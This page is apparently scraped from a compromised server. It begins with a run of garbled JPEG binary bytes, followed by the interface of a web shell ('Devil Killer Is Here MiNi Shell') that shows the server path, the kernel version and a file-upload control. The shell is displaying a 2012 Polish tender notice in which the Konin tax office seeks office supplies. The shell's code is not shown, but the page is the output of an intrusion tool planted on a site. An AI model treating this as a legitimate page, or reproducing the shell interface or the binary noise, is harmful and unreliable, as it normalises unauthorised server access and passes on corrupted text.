JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120620/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120620/211166-N-2012.html

<p class="kh_header"><b>Konin: 1.	Dostawa artykułów biurowych dla Urzędu Skarbowego w Koninie</b><br>
<b>Numer ogłoszenia: 211166 - 2012; data zamieszczenia: 20.06.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Skarbowy w Koninie , ul. Zakładowa 7 A, 62-510 Konin, woj. wielkopolskie, tel. 63 245-68-77, faks 63 245-68-71.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.uskonin.lm.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> 1.	Dostawa artykułów biurowych dla Urzędu Skarbowego w Koninie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia są sukcesywne dostawy artykułów biurowych dla Urzędu Skarbowego w Koninie
Nazwa wyrobu	                                             J.m.	               Ilość
blok biurowy A4 w kratkę 100 kartkowy	szt.	120
cienkopis czarny, nieb., czerw.,ziel., typu Handy Liner 0,4 mm	szt.	340
datownik mały	szt.	44
długopis zwykły typu i klasy Pentel BK77 SUPERB	szt.	250
długopis zwykły typu i klasy Zenith z metalowym wkładem	szt.	183
długopis na sprężynce na podkładce przyklejanej do podłoża	szt.	70
długopis z czerwonym wkładem jednorazowy	szt.	70
długopisy kolorowe - zestaw 6 kolorowy	opakowanie	32
druk - dowód wpłaty KP A6, papier samokopiujący, 80 kartek	bloczek	5
druk - polecenie wyjazdu służbowego A5, druk dwustronny, 40 kartek	bloczek	10
druk - rachunek A5, papier samokopiujący, 100 kartek	bloczek	3
druk - raport kasowy A4, papier samokopiujący, 100 kartek	bloczek	1
dziurkacz średni metalowy na min. 15 kartek, z ogranicznikiem formatu szt.	34
dziurkacz duży metalowy na min. 60 kartek, z ogranicznikiem formatu szt.	23
folia do bindownic bezbarwna A4, 100 szt. w opakowaniu, grubość 0,2 mm	opakowanie - 3
grzbiet do bindownic 6mm, 100 szt. w opakowaniu	opakowanie	1
grzbiet do bindownic 8mm, 100 szt. w opakowaniu	opakowanie	1
grzbiet do bindownic 10mm, 100 szt. w opakowaniu	opakowanie	1
gumka typu i klasy Pentel HI-POLYMER ERASER średniej wielkości	szt.	170
kalendarz A5-320k, offset biały lub chamois 70 g m2, wstążka, perforacja, oprawa imitująca skórę z podkładem z pianki	szt.	35
kalkulator typu i klasy CITIZEN SDC-368 lub SDC-868, bez funkcji GT szt.	25
karteczki w kostce 85 x 85 mm, 400 kartek w bloczku	-bloczek	240
karteczki samoprzylepne żółte 76x76mm,100 kartek w bloczku	-bloczek	310
kartka ozdobna świąteczna, wykonana z wysokiej jakości papieru, składana-szt.100
klej biały w sztyfcie klasy DONAU 36 g	- szt.	45
klej biurowy w tubce, poj. 50 ml, nietoksyczny	szt.	10
klip metalowy rozmiar 19mm pakowane po 12 szt.	opakowanie	50
klip metalowy rozmiar 32mm pakowane po 12 szt.	opakowanie	60
klip metalowy rozmiar 51mm pakowane po 12 szt.	opakowanie	35
korektor myszka	szt.	130
korektor w płynie, szybkoschnący, poj. min. 20 ml	szt.	150
kosz na śmieci plastikowy,15 l, z pedałem	szt.	20
koszulka A-4 -obwoluta groszkowa - min.50 mic., 100 szt. w opakowaniu, antystatyczne, wzmocniony pasek z perforacją	opakowanie	120
linijka 50 cm plastikowa przeźroczysta	szt.	22
linijka 30 cm plastikowa przeźroczysta	szt.	40
linijka 20 cm plastikowa przeźroczysta	szt.	45
lupa - średnica 9 cm	szt.	20
marker do tablic suchościeralnych czarny	szt.	43
marker do tablic suchościeralnych czerwony	szt.	30
marker uniwersalny czarny,czerw.,nieb.	szt.	330
naklejki na segregatory	szt.	400
nawilżacz glicerynowy do palców 	szt.	65
nici lniane szare-dratwa do archiwizacji na szpuli (0,5 kg) 	szt.	13
nożyczki do papieru ze stali nierdzewnej, długość 20-21 cm	szt.	62
nożyk do otwieranie kopert o długości 22,5 cm, rączka plastikowa, ostrze ze stali nierdzewnej, długość ostrza 8 cm	szt.	60
okładka do bindownicy A4, 100 szt. w opakowaniu	opakowanie	3
ołówek standardowy, twardość HB	szt.	220
papier A4 sztywny do dyplomów, 20 kartek w opakowaniu	-opakowanie	12
papier samoprzylepny biały A4, bez nacięć na warstwie podkładu i etykiety, 100 arkuszy w opakowaniu	opakowanie	2
pinezki kolorowe do tablic korkowych (kołeczki), 50 szt. w opakowaniu	opakowanie	18
pisaki wodoodporne, niezmazywalne, do pisania na gładkich powierzchniach, szybkoschnące, odporne na wyblaknięcie	szt.	30
pisaki do płyt CD kolor czarny	szt.	4
plastelina 6 kolorów	opakowanie	17
płyn do czyszczenia ekranów, 250 ml	szt.	30
podkładki pod myszki optyczne komputerowe, jednokolorowe z poduszką pod nadgarstek	szt.	60
podkładka na biurko z wbudowanymi piórnikami, z płyty pilśniowej oprawionej okleiną powlekaną PCV, z okutymi narożnikami, rozmiar ok. 700 mm x 500 mm,	szt.	41
poduszki do stempli, nienasączone, rozm. ok. 7 cm x 11 cm	szt.	25
pojemnik na spinacze z magnesem	szt.	65
przybornik wielofunkcyjny na biurko, prostokątny, z miejscem na art. piśmienne, spinacze, w komplecie z wkładem kartkowym	szt.	50
ręczniki papierowe - paczka 2 rolki	opakowanie	65
rozszywacz 	szt.	50
segregator A4-70 z mechanizmem dźwigniowym, kolorowa trwała okleina, etykieta dwustronna z otworem na palec, metalowe okucia na dolnych krawędziach-szt.1500
skoroszyt plastikowy oczkowy A-4, przednia okładka przeźroczysta	szt.	360
skoroszyt plastikowy bez oczek A-4, przednia okładka przeźroczysta-szt.	300
skoroszyt A5	szt.	25
spinacze małe 25-28 mm, 100 szt. w opakowaniu	opakowanie	400
spinacze duże 50-55 mm, 100 szt. w opakowaniu	opakowanie	160
sprężone powietrze spray	szt.	30
ściereczki nawilżone do czyszczenia ekranów LCD	szt.	40
środek do czyszczenia plastiku	szt.	15
szuflada (półka) na dokumenty z możliwością ustawiania jedna na drugiej z zabezpieczonymi gumką stopkami, z mocnego plastiku (format A4)	szt.	150
tablica korkowa 60x90cm, drewniana rama	szt.	1
taśma klejąca rozmiar 19 mm/33m, przeźroczysta, z podajnikiem-gilotynką (biurkowy podajnik do taśm klejących z obciążoną podstawą i paskami z gumy antypoślizgowej na spodzie, dzięki którym nie przesuwa się po biurku i umożliwia odrywanie taśmy jedną ręką)	szt.	100
taśma samoprzylepna pakowa rozmiar 50 mm x 66 m 	szt.	20
teczka na akta osobowe, oprawa twarda pokryta folią PCV, z mechanizmem 2-ringowym i wkładem ABC	szt.	20
teczka z gumką biała, 25 szt. w opakowaniu	opakowanie	40
temperówka z pojemnikiem 	szt.	95
tusz do pieczątek polimerowych, bezolejowy, czerwony, z końcówką ułatwiającą nasączanie poduszek, poj. min. 30 ml	szt.	150
tusz do pieczątek polimerowych bezolejowy, czarny, z końcówką ułatwiającą nasączanie poduszek, poj. min. 30 ml	szt.	26
wkłady do długopisu z pozycji 4 (typu Pentel)	szt.	340
wkłady do długopisu z pozycji 5 (typu Zenith)	szt.	380
zakładki samoprzylepne 4x20x50, 40 kartek w bloczku	bloczek	140
zakreślacz fluorescencyjny ze ściętą końcówką, szerokość linii 1 mm do 5 mm	szt.	300
zeszyt A5/32 w kratkę	szt.	70
zeszyt A5/80 w kratkę	szt.	80
zeszyt A4/96 (brulion) oprawa twarda	szt.	90
zeszyt A4/200 (brulion) oprawa twarda	szt.	10
zszywacz biurowy, części mechanizmu z metalu, na zszywki 24/6, zszywa min. 25 kartek 	szt.	70
zszywacz długoramienny zszywający do 100 kartek, na zszywki 23/13-szt.	16
zszywki nr 24/6, 1000 szt. w opakowaniu	opakowanie	500
zszywki nr 23/13, 1000 szt. w opakowaniu	opakowanie	50.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowych wymagań w tym zakresie. Ocena spełniania warunku nastąpi na podstawie złożonego oświadczenia, na zasadzie spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowych wymagań w tym zakresie. Ocena spełniania warunku nastąpi na podstawie złożonego oświadczenia, na zasadzie spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowych wymagań w tym zakresie. Ocena spełniania warunku nastąpi na podstawie złożonego oświadczenia, na zasadzie spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowych wymagań w tym zakresie. Ocena spełniania warunku nastąpi na podstawie złożonego oświadczenia, na zasadzie spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowych wymagań w tym zakresie. Ocena spełniania warunku nastąpi na podstawie złożonego oświadczenia, na zasadzie spełnia - nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.uskonin.lm.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Skarbowy w Koninie, 62-510 Konin, ul Zakładowa 7A, budynek B Urzędu, pokój nr 104 lub 105.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.07.2012 godzina 10:00, miejsce: Urząd Skarbowy w Koninie, 62-510 Konin, ul Zakładowa 7A, budynek B Urzędu, pokój nr 104 lub 105.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com